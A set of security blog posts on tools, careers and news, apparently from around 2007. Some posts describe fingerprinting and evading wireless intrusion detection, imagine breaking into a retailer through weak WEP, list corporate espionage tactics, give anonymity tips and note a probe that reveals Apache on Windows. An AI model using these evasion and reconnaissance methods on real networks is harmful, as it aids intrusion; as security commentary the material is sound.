The deauth mechanism is not set in stone, meaning implementation of frames can be done many ways. This combined with the various features means an attacker can detect and fingerprint a wireless IDS to better attack/evade it.
Detection/fingerprinting can be done via sequence number anomalies in the frames. Some vendors have set sequence numbers. Sometimes sequence numbers can be noticed as different between the wireless IDS frames and the real AP frames.
Detection/fingerprinting can be done via disconnect notice bit anomalies.
Detection/fingerprinting can be done by watching access point traffic in relation to deauth frames. If an AP really did issue a deauth, it wouldn't overlap that with assoc or other frames. If an IDS did the deauth, the APs frames may overlap, giving away the IDS.
Detection can be done by comparing the signal strength bits of deauth and normal frames. Deauths of a different signal strength can give away the IDS presence.
An attacker can sometimes slip data into a network by slipping in between deauths that are spaced too far apart. Some vendors allow this to be variable or simply leave more time in between deauths so as not to further saturate the wireless media.
An attacker can modify his wireless drivers to ignore deauth frames such that if an IDS only sends deauths to the client and not the AP, the connection is never torn down because the client takes no action.

Check the paper for more details, including patching madwifi drivers to ignore deauths.

It sounds like someone traced back the TJX breach back to a store in Minnesota that employed WEP as their only(?) protection for their wireless system. While this is a simplistic announcement, it certainly is not the whole story.

This illustrates how just one weak part of a huge network (or business) like TJX can bring the whole thing down. You can roll out secured (?) wireless to 1,000 stores, but it just takes one store whose manager doesn't quite understand the technology (should they really, though?) or one overlooked site by the techs doing the setup and you suddenly become a part of security and business history.

I also wonder where the layered protections were. Did this Minnesota store get automatically bridged into the corporate network that had access to all this sensitive data whizzing by? Did no one have any logs or tripwires up on anything to monitor access? How well did the attackers cloak themselves to look like innocuous or expected systems? Was anyone watching the wireless access logs, or anomalies in data collection/transfer that most probably occurred?

I see that the article mentions software patching was lax. I see that employee logins were sniffed (NTLM or clear text to proprietary system?). Sadly, for as much as we need details to improve security both at TJX and with PCI auditors (and the rest of us!), this is so costly that I doubt we hear more details for years until the courts release it. Did they ever rotate wireless passphrases? What was the real need for wireless in the first place?

So let's say I'm in Minnesota and see a Marshall's using WEP on their wireless network. I crack WEP and do some testing and practice some patience to make sure no one's watching the access and that I don't trip any IDS. Eventually I get comfortable enough to log onto the network and perform some stealth scans to see what I can see. I bet I can see a lot, including some unpatched machines which I can get a foothold into (in a best case scenario for me, I might just be right on the full corporate network through some dedicated VPN setup). This pretty much shows me that admins at TJX aren't quite as diligent as they should be, which can put me and my cohorts at ease. From there, I can sniff on systems I own and pilfer what I can. Lack of software patching standards probably mean shared passwords everywhere too.

Blah blah blah...there's plenty of places where TJX should have detected and or slowed down these attackers. Death by a 1000 cuts is becoming a pet phrase of mine...

A goo friend of mine and I were talking this weekend and the topic came up of corporate (and beyond) cyber espionage only just starting to be a force. I really believe that as more and more people have insecurity skills and our society continues to become more digitally dependent on information as our lifeblood in business, corporate espionage (which really has always been around) will only become more and more prevalent.

I wonder how many corporations (truly!) think it would be moral/immoral to:

1) Do some cyber "recon" at tradeshows on your competitors. Or maybe just DoS them during their demos? (active and passive attacks)

2) Hire some group to perform a DoS against a competitor's website/service during a particularly important moment.

3) Perform recon to continually footprint and find systems and sensitive information. Do you know how often a company can give away new projects just by their public DNS entries?

4) Perform dumpster diving regularly?

5) Feel ok with profiling and possibly probing employees home networks (particularly wireless)? Think c-levels and remote sales, for starters.

6) Send malicious emails to targeted persons in a rival company hoping to root the system? Do you know how quickly someone running as local admin can have a malicious program installed which can then sniff and or grab email account passwords for very important people and then send it back to someone who can log into webmail whenever they want?

7) Try to guess some webmail passwords of important people?

8) Pay for someone who has information about a rival because this person just sits at major airports and attempts wireless attacks against travelers, looking for juicy connections and info to sell?

I really think this is only going to get worse and much more commonplace. Besides, much of this stuff is still way too easy to perform, and in a way that is still way too anonymous. And I think anyone who has been online any amount of time knows that laws are more "easily" broken when you're not standing in front of a police officer. Physical presence is a barrier that most often protects our physical safety, but that deterrent is completely absent online.

In response to the 7 things sysadmins forget, Rebecca Herold commented and I wanted to pull it out for a separate post.

Forgetting that their sys admin job ultimately exists to support the business

No kidding! I think there are three mindsets when it comes to sysadmins (and really, IT/business in general).

1. Sysadmins who understand this concept and make decisions themselves on how their job relates to the business.

I consider these sysadmins to be empowered admins who understand their job. They can prioritize their time and make decisions frequently on their own that really do benefit the company and their own role. The sysadmin with this mindset tends to perform risk assessment and decision-making in her head and can sometimes be seen as making rash (but hopefully accurate) decisions.

2. Sysadmins who don't care about this question and instead defer this layer of involvement in the business to their boss.

Sysadmins at this stage seem to need lots of things escalated to their manager, even when small ticket requests have slightly larger implications. They do their job well, give a nice point to their manager on their views, but ultimately let someone else make a decision for them. Some sysadmins may get forced into this position based on the company and managers they interact with. When bureaucracy does not exist, this may be a result of lack of respect and trust given to the sysadmin such that he is not allowed to make his own decisions. Other times, this is just the style the business prefers.

3. Sysadmins who forget this all the time and really think the business exists to serve their job, or better yet, they only see their job as being ultimately important.

These sysadmins are typified by saying secure this secure that, even if it impacts business negatively. They make decisions based on their job only. Sometimes this is good, especially in a large corporation where you only really have a small slice to make decisions around anyway, but typically this is a negative mindset where the admin is likely never feeling fulfilled and really never fully gets his way...ever.

I think it would be beneficial to see which sysadmin one is, and what sysadmin the company nurtures. Even something as simple as me being a #2 sysadmin but in a #1 company can lead to unhappiness and underperformance. For instance, I like making decisions quickly on my own about what security and IT initiatives to do and how to do them, but if I am in a company where my boss and other managers hate that, I likely won't be very effective and we might all end up turning in sourpusses over time.

So, we have an intarweb that lets us post all sorts of zany things all over the place, from a ratty MySpace page to a litany of comments on news clippings and blogs and forums.

I know Dan Morrill talks now and then about making sure an employer Googles prospective employees. But what if someone has been posting using your name in various places? For instance, I make little to no effort to mask my online moniker, LonerVamp. But what if someone started using that name maliciously and posting hate and other garbage around that eventually gets indexed?

I saw this a few months ago and can't remember where I saw it. But I looked it up again and to save me from the trouble of losing it in the future, I'm posting this web 2.0 clip The Machine is Us/ing Us..

I've seen plenty about what Bruce Schneier said recently along with the feedback. Rather than address the content directly, I just want to say that eventually, many experts become nearly an establishment in themselves. Eventually they can say big, extreme things, and rather than be pissed away like some angry kid, they instead influence. Or at least make a valid point in their extreme. They kinda become those half-senile curmudgeons that are important enough that people listen to everything they say. He can say big things and doesn't mind if everyone else uses his words as a boilerplate.

Now, that's not a criticism. I don't think that is bad at all. But I think that when a lot of people my age get to be Bruce's age with a similar long background in this field, we might also see new things or futility in old things and say stuff that might be seen by others as a bit far-fetched. But I think his extreme approach is just a direct relationship to his notoriety and influence.

For some reason, I really wanted to work a quote in here as my mind drifted from establishment to institution. Anyway, I'll force the quote in anyway, "No, I want you to set a fire so goddamn big the gods will notice us again, that's what I'm saying. I want all you boys to look me straight in the eye one more time and say, 'Are we having fun or what?'"

Saw this on the SecurityFocus pen-testers mailing list and thought I would capture them here for future reference. These are some sites/tools to help evaluate web app security scanner tools.

SPI Dynamics zero.webappsecurity.com
Cenzic crackme.cenzic.com
Foundstone SASS tools
OWASP WebGoat
OWASP SiteGenerator
Watchfire demo site
Acunetix php test site

Typically, lots of the online "hack me" or "hacker challenge" sites like some in my right menu list tend to touch on web-borne "hacks" for their challenges as opposed to anything else. May get some mileage from them as well. Most also can be Googled for solutions should you get stuck and want to just learn quickly.

email (mailing lists) - Email is an important validator of people versus bots. It is also an excellent means to communicate with others and peruse email mailing lists which have some of the most traffic and information sharing of any method presented. However, you certainly do not want to use your own mail address from work, home, school, or even your own home server if you want to preserve your anonymity. Sign up for Google's Gmail and create an anonymous account.

Do not set up POP3/SMTP on your normal mail client and instead stick solely to the web interface using a non-IE browser that is diligently patched. Using your own client may tempt you to reply, and not every email service is necessarily anonymous when you send your email directly from a client application.

Don't send your "real" email accounts mail from this anonymous one; don't send yourself test emails; don't forward away from this email. Instead, copy-n-paste or test your anonymity using another anonymous mail source that allows you to view full headers. Hotmail, Yahoo, and Hushmail are other choices, although the latter either requires money or it will lock your account if you don't log in for 3 weeks. If someone gets into your super secret email account, you don't want your Sent items to give you away (and vice versa if you lose control of your personal account).

For some mailing lists, such as SecurityFocus, you can post replies via a web form (depending on the moderation of the list, you might have to at least provide a valid "on-the-list-already" email address. But at least this way you can check your mailing list anywhere, and always post under one address, or through a web proxy to hide your originating IP.

I also highly recommend finding a favorite throw-away email box. Pookmail is my preferred disposable (yes, I'm dropping Google search terms!) email service. You send an email with a reply address or somethingunique@pookmail.com, wait for a reply and pick it up at the website. Granted, this has zero expectation of privacy, but at least you can use this as a throw-away address. I use this when signing up for software trials and downloads and junk that require a valid email.

For my Powershell moment today, I have been working with setting file permissions. I had a problem trying to get permissions changes made to one folder to propagate down to all child items. I didn't really want to wipe out anything below, and I wasn't using any SDDL creation/twiddling approaches this time. Just a simple AddAccessRule that needed to be pushed down to all subfolders and files and still be marked as inherited.

I finally found a solution by pulling the ACL from each child item, doing a SetAccessRuleProtection($false,$true) and then setting the ACL back onto the child item. This basically seems to force the ACL to be refreshed, which then pulls down stuff that should be inherited.

foreach ($i in get-childitem $strTarget -recurse -force)
   {
      $objNewACL = get-acl $i.FullName
      $objNewACL.SetAccessRuleProtection($false,$true)
      set-acl $i.FullName -aclobject $objNewACL
   }

I speak truth, no so much as I would, but as much as I dare; and I dare a little the more, as I grow older. -Michel de Montaigne.

If you've ever visited my personal site, you probably picked up that I collect and love meaningul quotes (the more zen the better!). This one came up today and reminds me of Bruce's little speech in recent weeks.

Just for reference, a question about where to go for tutorials on Metasploit was recently posted to the pen-test mailing list on SecurityFocus. Here are some of the responses. At some point I need to explore this silc channel...

Metasploit (wiki)Book
Offensive Security 101
Metasploit Toolkit (Syngress)
milw0rm videos
IronGeek video
Tyler's videos

I've not hid my support for the forum (or BBS) format of information exchange; in fact, I think it is one of the best formats when actively used. While I may not participate, I figured I would help post around about a new forum that is trying things out: McGrew Security BBS. We'll see where this goes and if I find the time to participate, as it is that first year that is the most important (and hardest) for any forum to endure; kinda like trying to siphon water. You have to work at it until it becomes moreorless a self-sustaining conduit of incoming content and people.

Tonight I finally got around to installing vmware server on my new vmware box. I used a couple sites as my guides. Ever since starting Linux, I've learned to keep "journals" about what I've installed and the voodoo needed to get some things working for future reference. I'm getting better about putting my notes down into a more polished form early, but I still might get one or two things wrong here. I'll try to update as needed, but I suspect eventually these notes will just get ported over to the wiki.

I needed to install a few dependencies first since this is a fresh Ubuntu 6.10 install.

sudo apt-get install xinetd
sudo apt-get install linux-headers-`uname -r` build-essential

this folder will be used to hold the vms:

mkdir /var/vm

Download both files (server and management user interface) into a temp folder get a registration key while on the site. This is free and doesn't require any valid information, not even email. The key will appear after submitting the form (the sales teams must love that!).

tar xvfz VMware-server-*.tar.gz
cd vmware-server-distrib
sudo ./vmware-install.pl

I answer /var/vm as the location for virtual machines. I also answer "no" for NAT or host-only networking (leaving me with bridged mode) as I really just want my VMs to be grabbing an IP off my network and have full access out to the Internet (at least on this machine).

Next is the MUI.

tar xvfz VMware-mui-*.tar.gz
cd vmware-mui-distrib
sudon ./vmware-install.pl

All defaults for the MUI. This should fail to start the httpd server at the end and needs a patch.

cd /tmp
wget http://users.piuha.net/martti/comp/ubuntu/httpd.vmware.diff
cd /
sudo patch -b -p0 < /tmp/httpd.vmware.diff
sudo /etc/init.d/httpd.vmware start

This is the location once it has started: https://localhost:8333.

To create VM, you will need to use the console (not the MUI) by heading over to Applications->System Tools->VMWare Server Console in the kicker.

An article about a Cisco FTP vulnerability caught my eye today. The article gave little detail, so I checked with Secunia and sure enough saw an advisory. That's an interesting vulnerability (impacting, but not enabled by default...so not the holy grail of network hacking), and I would hope good admins have taken some measures to already mitigate or avoid this issue.

First, don't use the FTP server. I'd rather use an external TFTP server as opposed to one on the router itself. Second, even if the config is disclosed, limit the damage by making sure your enable and enable secret passwords are different, as are the SNMP strings and other access passwords that may be disclosed in the config. Also make sure they're all different across other routers (minus the SNMP string of course). Third, update your IOS, of course, and hope that Cisco puts in a (long overdue) SCP/SFTP solution sooner than later.

Of additional note, I'm still itching to get my hands on the Hacking Exposed: Cisco Networks book. It taunts me weekly from the bookstore shelf, but I just don't want to get too confused as I am hitting the running strides of my study for CCNA (which I will take in late May or early June).

If you do much work using Ubuntu and multiple computers, you may have noticed when using vncviewer to remotely connect to a system with a higher screen resolution, you'll get these annoying black scrollbars. These bars seem to only scroll in one direction and then never scroll again, right?

Well, wrong. Turns out these bars do work, you just have to right-click to move the bars the other direction. Middle mouse button will work them in either direction. That's just weird and I'd rather not deal with it.

There is another solution. On your client system, go to your repositories or otherwise apt-get xvnc4viewer. This will fix those dang scrollbars. As a bonus, this seems to replace any vncviewer apps you have on the Ubuntu client. If you type vncviewer, you get xvnc4viewer. If you click Applications->Internet->Terminal Server Client and attempt a VNC connection here, you also get xvnc4server. Nice!

Turn Firefox into spyware! I saw Xavier Ashe post about FFsniFF which is an extension for Firefox. It will not display itself in the extensions list, wait for HTML forms to be submitted, and email the contents of that submitted form to some email address. On one hand this makes me say, "What the crap...?" On the other, I could pilfer info from a lot of people who otherwise trust Firefox as their browser. While I might need admin rights to install keyloggers, I wonder if I could install this extension as a normal user? I guess this might not be a huge deal as there are browser password managers galore anyway, and they have to get those passwords somehow, but FFsniFF still seems very shady...

Just about a year ago Noam Eppel released a paper that got posted pretty much everywhere and got lots of people in the security ranks talking. The paper was titled Security Absurdity: The Complete, Unquestionable, and Total Failure of Information Security. If that title didn't smack of an extremist and very dramatic "I'm not here to listen to rebuttals" tone, then I don't know what would.

I held my comments, and instead wanted to hear Noam's follow-up article on what can be done to fix this. I really felt the first article was simply a dramatic flailing of arms and statistics on how everything is wrong; a device to get people all up in a lather and frothing at the mouth by saying something obvious and ignoring any real forward movement. I could make claims like, "Racism is bad, yeah, let's all get violently upset that racism is bad!" and keep fanning those flames without actually doing anything to combat racism. Lots of Feel Good, not a lot of Forward Movement.

Noam promised in that article he would collect responses and combine those responses with a follow-up article on how to solve the issues. Under the header, "How can we fix this?" he offers, "Part Two of this article will contain a list of what we must do to address our current failure. It will incorporate your commends and feedback." Honestly, this sounded half like he was going to use other people's suggestions to formulate his own; Shady.

Sadly, the follow-up I had hoped for was not to be.

Instead, Noam's follow-up consisted of some "Yay, people agree with me!" at the start, and then dogged down into the mud to simply argue at people who offered up some skepticism or disagreement with him. Basically, rather than fostering discussion, he quelled it by attacking the discussion to defend his vague position. He also offered no suggestions or solutions beyond a few weak moments in the first paper (2 factor authentication for gmail and hotmail...). This whole exercise seemed very self-serving and kinda like a cathartic rant session (not that we don't all have those, but maybe not quite so useless and attention-pleading).

I am overall disappointed with this approach. I don't argue that the general feeling of Noam's article is wrong. I think we do have problems and issues, although I'm not sure we have a total failure. I had much more to say about the article, but I don't feel it worthwhile so will just let this little anniversary end with the bullet form of what some of my points would have been:

1) You can't use stats to measure something that is as a whole growing; you have to wait for a platuea to get meaninful stats, or perhaps ratios.

2) Noam's expectations may not be reasonable as he implies that people should feel safe doing "normal and common" stuff online. Kinda like I should feel safe walking around a really bad neighborhood with $100 bills sticking out of my pockets? I wonder what reality Noam is envisioning in regards to information security utopias? We need to define this better if we have any hope of moving arbitrarily forward.

3) I wonder what state we'd be in if we didn't have what security we do have now?

4) It might help to look at security and nature (Arms Race? evolution?) throughout history. It might give Noam some more perspective on reasonable expectations in security.

I don't typically single out new links I add to my menu, but the blog at SecurityHacks has been posting some neat stuff. I still think there is "market bandwidth" for sites that show off tools or "how-to" sorts of postings in our niche blogosphere (although a forum or wiki may be more appropriate long-term information storage). They have gone over creating an SSH tunnel for Windows SMB connections ( I think if you're going to this much trouble, may as well learn SSH transfers or implement a full VPN), SQL Injection scanners, and "recovering" Firefox stored passwords. There's also mention of pwdumpx (not to be confused with pwdump or even fgdump...

Every now and then I like posting about new and coming technologies or things that budding (or bored!) security persons can look into to get a leg up on other professionals. While I may not have bandwidth myself, I can at least identify them for my own reference or anyone else as well.

Vista. While lots of people are resisting Vista as not an entirely necessary upgrade, this is, quite frankly, the future of Windows computing. It might not be even next year, but at some point all of us will be forced to update to Vista, either to dropped support for XP or simply because all our home users' new computers come with it installed...then remote access needs updated, QA needs test machines, web sites need to work...and so on until you have to adopt it. So get Vista today, be aware of the licensing and versions, figure out the nuances of wireless and wired and security concepts in Vista, and tinker with supporting it on a wide scale (scripts, GPO, firewall, etc). May as well start now and get moved otherwise you'll be like me where I still run Win2000 laptops (ok ok, so I like the non-hassle of Genuine Advantage license checks that don't exist for Win2000 and the smaller resources footprint on my old laptops...). Nonethless, it may be years away, but rest assured someday Vista will be the standard.

Macs. Macs have long been on the fringe of corporate networks, likely only used by graphics or designers. They are exceptions in corporate policy and management and typically corporate IT have no Mac experts and leave management to third party contractors or the users themselves. As Macs continue to make headway into home users (and especially security people like us) it makes sense that we become Mac-aware enough to support those users and add that to our corporate IT merit badges. Like I said, few IT geeks really can support the Macs, so one-up the rest and learn them. As a bonus, try to figure out how to make sure your monitoring and systems management can become Mac-friendly so they're not always the exceptions to the rules.

Get on top of Longhorn now. While slated for the ever-skeptical release date of early 2008 now, like Vista, it will eventually be the de facto standard, for better or worse. Likewise, get ready for Powershell, Windows upcoming enhanced shell experience (which will also be the primary means to manage Exchange 2007).

This is one of the challenges of being an IT geek. You can't just learn Windows 98 inside and out and hope to stick with it forever. You gotta be ready to move with the world and learn new things rather than sit back and cling to the past. Ask any mainframer from the 80s and 90s who doesn't get to work on mainframes anymore...

From Windows Incident Response I was reminded about fe3d, a 3d visualization tool for nmap scans. While possibly not very practical, it does make for feel-good eye candy in a dark room or when someone is watching you that you want to impress (managers!). The timeline on this project only goes back a few months, but I swear I saw this tool a couple years ago.

Want to RDP not into your own session, but into the existing console session? Yeah, me too, and I always seem to forget this Run command for Windows:

mstsc /v:SERVER-OR-IP /console

Managing security from a data-centric point of view is like herding cats. Rambunctious cats. Cats that want to be free. Cats that spontaneously multiply. Like tribbles.

I was thinking today about how interesting something like a centralized Office suite (such as Google Apps) when it comes to making sure people are not distributing your data wantonly. For instance, how often have you seen the sales exec who has access to sensitive information in a file share forward on a copy of that document to his reports via email. Reports who shouldn't be seeing that stuff?

This brings me to thinking about data security a bit more. Often I see people talk about the two obvious pieces: Data At Rest and Data In Motion. These are pretty obvious. Data At Rest deals much with access permissions and encryption. Data In Motion deals with encryption of the channel over which data is transmitted.

But there is more. What about Data In Use? Can your users print, copy, move, and otherwise twiddle the data they have access to? No amount of the first two pieces will stop that sales exec from making his mistake. Can they open a doc and recite the numbers to someone over the phone or take photos of it? Yes, tough if not impossible to fully stop, but a concern nonetheless? (Yes, it is arguable whether we should spend time thinking about the unfixable...)

You know, the corporate world was once a terminal environment with centralized computing. We've moved on from that, but so far lots of our issues can be solved with tightening back into centralized computing. We don't like to think that way, but it's true.

The two caveats in centralized computing? The mobility trend. The fact that users are also consumers and are used to having "the power" on their computer systems at home.

IP addresses are running out! While I'm not about to start crying that the sky is falling, the article linked mentions that we will be out of IPv4 addresses in 2012 or 2013.

Considering most shops spec their network gear lifecycle to 4 or more years, now is the time to start paying attention to the needs on the infrastructure. We can all do out part today to ease the pains of this changeover. Any gear you buy today on your network, particularly the critical and perimeter infrastructure should either have IPv6 support today or have an aggressive roadmap to get there soon.

Also, for those budding (or bored!) security persons (again!), study up on IPv6 now. Learn how it works and how to implement and troubleshoot it.

Simple things feel good. They really do! Keep life simple. Flashing across the full-disclosure list this week was a simple way to enumerate whether an Apache web server is running on Windows or not.

If you make a call to a page that does not exist, you get a typical 404 error, like this page that doesn't exist. (Yeah, in a few months I'll regret putting up a purposely dead link when I see it in the logs...). But try hitting a link to domain/AUX. You get a far different error on my site because, yes, stone me now, I run Apache on Windows. Try it on someone else's site that you know is running Apache on nix, and you'll just get the normal 404 error.

So next time you're curious about a web site and you've confirmed it runs Apache, try the "on Windows?" test so you don't look stupid trying to use "root" on the listening SSH port or throw in a battery of nix-only vulns to the website.

From Whitedust.net, they have announced a new visualization tool for network traffic called Eve. Visualization tools are fun and typically look cooler than they are useful (imagine the proud managerial looks when you see this running in the NOC?), but you never know. Someday a really slick-looking visualization tool is going to be outstandingly useful. Maybe Eve will hit that mark? I dunno, but surprisingly the tool looks to run on Windows by mention of the winpcap library. If this looks slick enough, I would seriously consider a copy for the price they list, even if it just runs in the background on an old machine on my desk.

IRC - IRC is an interesting beast. Even today, this relic of the Internet is still the best place to socialize and talk with others in a realtime forum that includes more than just 1-to-1 conversation (did I qualify that enough??). But it also suffers from easily giving up your connection information as well as other anti-anonymous attacks. Pretty much anyone can just issue a /whois and they can read back your IP/hostname. Really, nothing is easier or more idly tempting as port scanning some noob on IRC to see who's home. Note: I have not used silc yet, so I don't really mention it here.

1) general IRC recon and host masks
When you first log into a new IRC network, do not do so using a nickname that you plan to use. Log in and poke around. Do a /whois on yourself and see what is revealed. Connect a second time with another name and whois yourself. Find web support and the main support channels and poke around to see if the network supports any built-in methods to mask your host and IP. Irc.freenode.net and others may allow you to register your nickname and also request or set up a host mask so that /whois returns only what you want it to return. If that is the case, switch over to your normal nick, register it, and get it masked.

Always use a different nickname when doing tests or when you think your masking is not high enough. While this isn't done as much as in the past, there are still chat channels that get logged and posted right on websites for posterity.

Keep in mind that even private messages are not necessarily private when you do not own the servers and other people are the admins. You may not be as private as you wish you were.

If you plan any unattended idling, turn off auto-accepting any files or DCC communications and make sure no URLs are automatically opened or captured. Make sure your secondary nickname is not revealing in case you disconnect and reconnect automatically before your old connection has timed out.

2) bouncers and proxies If you do not have the luxury of masking your host, you can make use of IRC bouncers or proxy connections much like web proxies. Bouncers are pretty much the same thing as a proxy, only harder to find unless you own a box or two somewhere else (or pay for a shell).

You can also use web-based IRC clients such as www.ircatwork.org. However, always test these by connecting with a different nick and /whois yourself to see if something is leaking through anyway. These can be a hassle to set up and maintain, so perhaps just familiarize yourself with IRSSI (text-based IRC) and see if you can get a shell that allows IRSSI so you can bounce off that.

Otherwise, use network and wireless connections that are not your own to communicate over IRC. Personally, I prefer using Freenode and masking my host.

3) links, DCC, other notes
Also, don't click on any and every link in IRC...at least not without your web proxy firmly in place on a safer web browser and connection link. If I had my eye on you, I might try to get you to click a link on my website hoping you would then leave some crumbs in my server logs.

Never accept DCC Chats or Sends. These negotiate as direct connections. If you accept a DCC Chat, the person on the other end will have the ability to see your originating IP, masks or not. You can proxy DCC connections, but I prefer to just not accept them at all as there is really no reason for it when FTP and HTTP have become more than ubiquitous.

More information can be found at http://www.searchlores.org/irc_kane.htm. If I had found this before writing my post, it sure would have saved me a lot of composing!

I love it. There are a number of free security-related tools floating around these days and they seem to be of the "do more, have more features" variety. On my Windows systems at home I prefer to run ClamWin as my AV and Sygate Pro (a full version pre-Symantec purchase/dump) as my personal firewall. I've been using Comodo firewall for a while now on one laptop, but I really have no taken the time to baby it and nurture it and really get to know it, so I might just revert back to a Sygate install.

But I keep getting tickles to try something new. I see OSSEC has Windows agents that do things like HIDS, log analysis, registry and rootkit scanning, integrity scanning, and more on the server component. I also see CoreForce which provides a BSD-like firewall, registry and file permissions, integrity scanning, and malware prevention. Both tools are free, although the latter is Windows-bound and standalone while OSSEC likes to have a server component to shuttle data to.

It is nice to see multiple pieces getting packaged together in, hopefully, light-weight apps that won't be hogs like NAV or your more commercial type protections. I like integrity checking, access monitoring, log scanning, and firewalling, along with the typical HIDS/behavioral analysis and malware detection/prevention. I'm just hoping these two products don't overlap too much if I want features from both. And of course, there's my poor ClamWin to think of.

Anyway, tools for thought. I really wish Sygate hadn't been raped...after ZoneAlarm got dumbed down back in like 1999, Sygate was my saviour...

Seems the FBI has the same challenges the private sector has when it comes to maintaining a secure environment. The GAO released a report to the FBI about security weaknesses in a critical internal network. I found this from FCW. I only skimmed the 30-odd page report, but ~~a lot~~ all of their weaknesses are quite familiar.

LiquidMatrix posted 4 interview questions for Infosec candidates. I like the questions, personally, and I think they get to one thing I really like to pimp about myself but also value in people in infosec: the geek factor. How much of a geek are you? In other words, how much personal passion do you have for the field? I think this is highly important. Anyway, no preaching yet today, so here are my quick answers for this interview.

1. What is the hostname of your computer / essid of your wifi
How fun! For years, I have stuck to the whole vampire/goth chic with my systems. My main server is named Vampire (and always is, no matter what actual hardware is running it) and my essip is kindred. Unfortunately, the more systems I've had, the more I've had to dive away from that theme. I have systems named Nosferatu, Hunter, Samurai, Orion (my main laptop, named for personal reasons to do with stargazing), Golem (parted gaming machine), and so on...

2. Which infosec event/conference do you think is the *one* you need to attend each year
Blackhat is too expensive for me alone, and I certainly do not want to do to anything commercialized with more CSOs present than geeks. I think if I had to choose one single event, I would head to Shmoocon. Then CanSecWest and DefCon.

3. You’re doing a walk around and notice an iPod plugged into a laptop - what do you do
Yeah, it sucks reading these questions and already seeing the "good" answers, but I agree with the poster, I would first ask, "Well, what's the policy?" I don't want to get into pissing matches over vagueness (I wanted to use vagarity here, but the word is already laterally claimed) of policies and enforcement. If I don't have to impact someone else and rock the boat, I won't. So I'd ask about the policy. If there is a policy, I would likely unplug the ipod but leave it on the desk (again, depending on the policy and corporate culture standards on enforcement) and email a note to the employee mentioning it. I'd likely then make a small extra effort to follow-up later that week to see if the ipod is still present, and if so, escalate as needed, more likely with a cubicle-call in person or a quick note to their manager. Nothing overbearing or demanding, just subtle reminders of policy and why it is in place. I'd also test the waters in using technology to block the hardware ports on systems to force policy adherence. Again, though, this all depends on policy and corporate culture.

4. You’ve been asked by HR to take a copy of an outgoing employees computer - what do you do
I've not done one of these in a while, but my first reaction in my previous job where I did this a couple times included questions. How much do you need copied? When do you need this started and done? Does the employee know about this or should this be secret? How important is this, while I don't need details, should I be concerned about eventual legal proceedings or is this just a CYA moment (this may dictate how stringent I follow chain-of-custody or imaging standards)? Do you need me to look at anything in particular or just make the copy? What do you want done with the copy and/or hardware after? Basically, the theme here is to ask questions and quality the request as much as possible without making it seem like you're fishing for the juicy gossipy details of the incident; I'm not like that and never will be, even when I am privvy to those details (one of the other things I value along with geekery is integrity).

Snagged straight from the bush from the Guerilla CSO

I see there's been some talk recently (more so than normal on the blogs I watch, anyway) about network security, web app security, host-centric security... I feel like a lottery tumbler bouncing around a lot of balls in my head, but nothing popping out down the chute quite yet. So here are some links for future thoughts. Jeremiah Grossman talking about web app vs network security. Hoff talking about host vs network security. The Jericho Forum talking about lots of things, but notably deperimeterization catches my eye. And Michael's thoughts which have the side effect of wanting to pull out some C&C Music Factory mp3s (and yes, I have a bunch!). I also see Scott has an excellent post about this topic as well. And another from Alex, although once anyone starts talking ephemerally (in terms of relativity to business process which might be the agnostics' way to offer up an inarguable concept? [see? obviously I'm not seeing something straight! hehe] ) about things like the Circles of Trust, it never really makes much sense to me yet (yet!).

My initial reaction is that I am not sold on "unified" or "one method to rule them all" approaches. I'm with Michael in the link above in most regards: practice moderation and mix all of them in varying levels. Honestly, if one of these approaches was better than the others, it would be obviously apparent by now.

However, there may be some merit in a company focusing their efforts and monies in one method consistently...

I think one approach to these questions might be in looking at the extremes. What would your network or company look like from an infosec point of view if you were host-centric in your approaches? or network-centric? or data-centric? What is given up, what is scalable, what costs the most either up front or on-going? What is possible with the skillsets we have in our company/country/world right now?

WiFiDEnum (and no, I'm not really sure how to say that out loud) has been released by Joshua Wright. This tool reports back wireless driver versions against known vulnerabilities. Try it out. Hopefully the tool is kept up to date as more vulns become announced (slowly). While I never expect that to be the case, I think this tool appears useful enough to Josh and his company and might get some lovin over the years. The next step may be a more hostile enumeration tool that can sniff and/or actively fingerprint a host's wireless card and drivers (and no, I don't know if that is even possible to a worthwhile degree).

I just read an announcement that usernames can be disclosed by the way Windows Server 2003/AD responds to Terminal Services logins from those users trying to log on after their allowed hours. Kudos to the researchers for finding and reporting this, and I mean this post as no dis to them (hey, I read Sid's site for a reason!). But I do have some commentary to offer.

First, Sid uses the phrase, "This can be exploited to help enumerate valid usernames resulting in a loss of confidentiality." Not bad, but I think it is very arguable whether usernames are intended to be confidential or not. I mean, that's what passwords are for, no?

Second, this is a place where a vulnerability needs further clarification once you start trying to cross the bounds from technical geeks to the lesser geeks and business itself. Is this vulnerability a Big Deal? No. What threats could take advantage of this? Well, you have long-standing insiders (yeah, those help desk guys who work all night and get bored and poke around) on a long campaign to pilfer usernames...but if they are employees, chances are they know the username format anyway. Also long-term outside attackers who already have an undiscovered foothold into the network and want to expand their influence. For some reason, this scenario tickles that part of my brain that likes to say, "You have bigger problems at this point." Maybe someone has Terminal Services accessible to the world, in which case a random port scan could reveal it to an outside attackers who starts trying usernames to grind out more information, or outright access.

My second point is more about those people who interpret vulnerabilities in the context of their respective duties. The disclosure itself is just fine and quite appropriate. I'm simply using it as a sounding board to illustrate the ability to analyze vulnerabilities.

To the author's credit, he lists criticality being "Less Critical," although I really don't know what that means. To me, this vulnerability is minor. It discloses some non-sensitive information pertinent to longer-term attacks by dedicated attackers with nothing better to do.

Skimming my captured spam comments these days really makes me feel like I'm browsing porn, albeit in text form. I have quite the imagination...and if the guys keep slipping Viagra into my lunch, things are gonna get wrong on a new level.

Ok, kidding! Seriously, my comment spam has skyrocketed since Thursday or Wednesday of last week, almost all about various drugs and the rest about porn. It is amazing how often I catch myself reading one when it doesn't sound quite obviously spamlike. "Hey man, that's an interesting post..." I've bumped up the filters to get most everything, but if I don't unmoderate a post you make, feel free to stalk me and track me down or otherwise get my attention.

Joel Esler posted some questions about email signature blocks. Neat. Personally, I keep my signature lengths down to 1-3 lines or so. My name, email address, and maybe who I am if you don't know me (title or web site). I think I got over the whole quote thing back in 1998, so I don't do that anymore. I think after you get so many email addresses, you stop really caring to configure and tailor each one.

On a similar topic, I really have a peeve against email disclaimers like "please delete this email if you mistakenly got this..." blah blah blah legal crap. No one freakin' needs this on every piece of email sent out. It's useless and stupid. Maybe I should walk around with a card that says, "If I hear some secret you say near me or you hear me calling you a complete asshole, it's ok and please ignore it if you were not the intended recipient...oh, you're not the intended recipient, ever." Yeah, that'd fly.

